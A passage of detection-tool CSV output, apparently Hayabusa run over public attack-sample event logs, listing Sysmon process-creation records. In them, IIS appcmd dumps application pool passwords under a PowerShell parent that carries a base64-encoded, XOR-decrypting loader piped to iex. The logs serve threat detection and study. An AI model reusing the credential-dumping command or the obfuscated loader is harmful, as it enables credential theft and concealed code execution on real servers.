AGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.891 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.971 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.041 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.121 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.202 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:18.282 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUA